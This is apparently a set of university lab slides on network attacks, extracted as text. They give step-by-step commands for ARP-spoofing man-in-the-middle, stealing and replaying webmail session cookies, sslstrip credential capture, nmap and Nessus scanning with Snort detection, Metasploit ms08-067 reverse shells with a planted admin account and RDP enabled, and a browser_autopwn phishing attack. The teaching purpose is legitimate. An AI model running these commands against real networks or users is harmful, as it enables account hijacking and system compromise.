This action might not be possible to undo. Are you sure you want to continue?
Computer Networks Security
Laboratory Topic: Network Attacks
Adrian Furtună MSc, C|EH firstname.lastname@example.org
“With great power comes great responsibility”
1. Interception of network traffic transmitted using a clear-text protocol (HTTP)
=> obtaining session cookies => using session cookies to enter a victim’s web session
2. 3. 4. 5. 6.
Interception of network traffic transmitted using an encrypted protocol (HTTPS)
=> obtaining username and password for web login
Scanning the Windows VM using nmap (+Snort disabled/enabled) Scanning the Windows VM using Nessus (+Snort disabled/enabled) Gaining access to the Windows VM by exploiting a network service vulnerability Gaining access to a Windows machine with a client-side attack:
=> social engineering => exploit browser vulnerability => use Metasploit to own the machine
Rules It is forbidden: Any scanning / attack outside laboratory network Any scanning / attack against your colleagues’ machines or against instructor’s machine Breaking these rules might lead to severe penalties Network Attacks 3 .
Administrative tasks Connect to ftp://email@example.com Install VMWare Player Unzip both virtual machines Network Attacks 4 .1.laptop.exe Windows VM: winxpsp2_web_snort.zip Backtrack VM: bt4-final-vm.ip username: stud password: stud Download: Course slides VMWare Player: VMware-player-3.
Virtual machine configuration Network Attacks 5 .
Laboratory setup (1) You will work in pairs (1 pair = 2 distinct computers): attacker and victim Victim machine = host machine Attacker machine = Backtrack VM Start Backtrack [ username: root. password: toor ] Open graphic mode: startx& Set network card in mode bridge ! Obtain IP address: dhclient eth0 Network Attacks 6 .
Laboratory setup (2) Network Attacks 7 .
Captures network traffic of the victim and extracts the necessary data Network Attacks 8 . Becomes MITM 2.Exercise 1 Obtain the session cookies of a victim from the local network and use them to enter his Yahoo mail account The victim needs a valid Yahoo mail account (a test account) The victim will open a web mail session The attacker 1.
1. Inform the Victim that the Gateway’s MAC address is your MAC address – attacker. 2. View the traffic using Wireshark. Find the IP addresses of Victim and Gateway Activate the routing process in Backtrack echo 1 > /proc/sys/net/ipv4/ip_forward 3. (ARP poisoning using ARP replies) arpspoof –i eth0 –t IP_Victim IP_Gateway 4. Attacker machine: Become MITM and intercept all traffic sent by victim to the Gateway. View the network traffic of Victim using Wireshark Network Attacks 9 .Exercise 1 – cont.
6. 1. Find the session cookies of Victim and use them to enter his email session Wireshark -> Follow TCP stream on a TCP packet sent by Victim: 2. 3.Exercise 1 – cont. 5. Copy the cookies Y and T in a text file Install the Firefox plugin AddNEdit Cookies Open an Yahoo mail session of your own (attacker) Use the plugin to edit your cookies and replace Y and T with the ones of the Victim Refresh the web page Network Attacks 10 . 4.
Find the username and password of the Victim. 2.Exercise 2 Intercept network traffic during a HTTPS session. Yahoo login) Extract the useful information from file traffic. 1. The victim accesses a web site using HTTPS (ex. 5.log Network Attacks 11 .org/software/sslstrip/ 3.log More details here: http://www.thoughtcrime. Configure IPTABLES to redirect HTTP traffic to SSLSTRIP iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1234 4. Make yourself MITM (see exercise 1) Start SSLSTRIP and make it listen on port 1234 sslstrip –l 1234 –s –w traffic.
com Statistic anomalies Protocol anomalies Network Attacks 12 .bleedingsnort.org/assets/166/snort_manual.com/ Portable (Linux. BSD. HP-UX. MacOS X. etc) Multiple mechanisms for intrusion detection Signatures (rules): www. Solaris. Windows.pdf Netwok-based IDS Open source (free) Sourcefire – commercial version (appliance) http://www.About Snort http://www.snort.sourcefire.
conf Alerts/Logs Network Attacks 13 .\etc\snort.exe -v –d -e • Packet logger Snort Packet Stream Sniffing Packet Decoder Preprocessor (Plug-ins) Detection Engine (Plug-ins) Output Stage (Plug-ins) Data Flow snort.\log –c .exe –vde –log ...exe –d –log ..\log • NIDS snort.About Snort – cont. Snort running modes: • Sniffer mode (like tcpdump) snort.
1 Network Attacks 14 .Nmap briefings TCP connect() scan: TCP SYN scan: TCP UDP scan: Ping scan: nmap –sT <IP Address> nmap –sS <IP Address> nmap –sU <IP Address> nmap –sP <IP Address> TCP FIN / Xmas Tree / Null scan: nmap –sF/sX/sN <IP Address> Version Detection: OS Fingerprinting: nmap –sS -sV <IP Address> nmap –sS -O <IP Address> Example $ nmap -sS -sV -O -F -n 192.168.1.
Change setup Start the Windows VM New attack direction: Backtrack Windows VM Network Attacks 15 .
Obtain the following information (from a single scan): • Live hosts • Open TCP ports • Service version • Operating system .Save all output in a text file Hints: nmap –h man nmap Network Attacks 16 . scan the whole subnet of the victim machine (connected to vmnet8).Exercise 3 Using nmap.
ids) Network Attacks 17 .\etc\snort.\log –c ..exe –d –l .conf –A console Perform the scanning again using Nmap Any alert? (see c:\Snort\log\alert.exe -> cd c:\snort\bin • snort. Check if the scanning can be detected by a NIDS (Snort) Authenticate to Windows VM (password: user) Start Snort • cmd.Exercise 3 – cont..
tenable.1-ubuntu910_i386. Then obtain a Nessus activation code (Home Feed) http://www.1:8834 Network Attacks 18 .0.com 2.0. First install Nessus on BackTrack: Download Nessus (for Ubuntu 9. Configure Nessus server Add a Nessus user: /opt/nessus/sbin/nessus-adduser Register Nessus and update plugins: /opt/nessus/bin/nessus-fetch --register CODE Start Nessus server: /etc/init.com/products/nessus/nessus-plugins/register-a-homefeed 3.tenable.4. Start Nessus client: https://127.deb http://www.10 32 bit) dpkg –i Nessus-4.d/nessusd start 4.Exercise 4 Scan the victim machine using Nessus to find vulnerabilities 1.
Sample vulnerability: 1.Exercise 4 – cont. 3. 4. 2. Create a scan policy Select plugins Set target Run scan Network Attacks 19 .
com/metasploit-unleashed Network Attacks 20 .About Metasploit Framework for writing and executing exploits Modules Exploits Auxiliary Payloads Encoders Nops User interfaces: .offensive-security.console: msfconsole .GUI: Updates: msfgui cd /pentest/exploits/framework3 svn update Select Exploit -> Configure options + payload -> Run exploit -> Execute payload Tutorial: http://www.
Network Attacks 21 . TARGET = 3. 2. 4. ipconfig. 3. 8. PAYLOAD. hostname) 1. exploit 9. etc (for payload use windows/shell/reverse_tcp) 8. 6.Exercise 5 We will use Metasploit to exploit vulnerability ms08-067 and gain remote access to Victim machine cd /pentest/exploits/framework3 . Execute windows commands in the obtained shell (ex./msfconsole help search ms08-067 use exploit/windows/smb/ms08_067_netapi show options show payloads set RHOST. LHOST. 7. 5.
x.x & Network Attacks 22 . Obtain Remote Desktop access to Victim machine: Add a new user: net user myuser mypassword /add Add the new user in the local Administrators group: net localgroup Administrators myuser /add Start the Remote Desktop service reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f Check if the victim has open the port for Remote Desktop (use nmap) Connect to the victim machine using: rdesktop 192.Exercise 5 – cont.168.
etc) Network Attacks 23 . Acrobat Reader. MS Office.What if? Victim has all ports closed (firewall) Operating system is patched Answer: Attack client applications and plugins (web browser.
Change setup Start the firewall of Windows VM Disable any exceptions Use nmap to verify that there are no more open ports Network Attacks 24 .
Use Metasploit and browser autopwn 1. 6./msfconsole use auxiliary/server/browser_autopwn set LHOST 192. 4.Exercise 6 Exploit browser vulnerability to gain remote acces.x (attacker IP) set SRVPORT 80 set URIPATH mypictures. 5.html exploit Network Attacks 25 .x.168. cd /pentest/exploits/framework3 . 2. 7. 3.
x.x/mypictures.Exercise 6 – cont. Send victim an email containing the link: http://192.html Victim clicks the link Attacker obtains meterpreter session Network Attacks 26 .168.
Other useful tools Ettercap http://ettercap.oxid.sourceforge.com/tools Network Attacks 27 .net Cain&Abel http://www.it/cain.html The Middler http://inguardians.
Q&A ? Network Attacks 28 .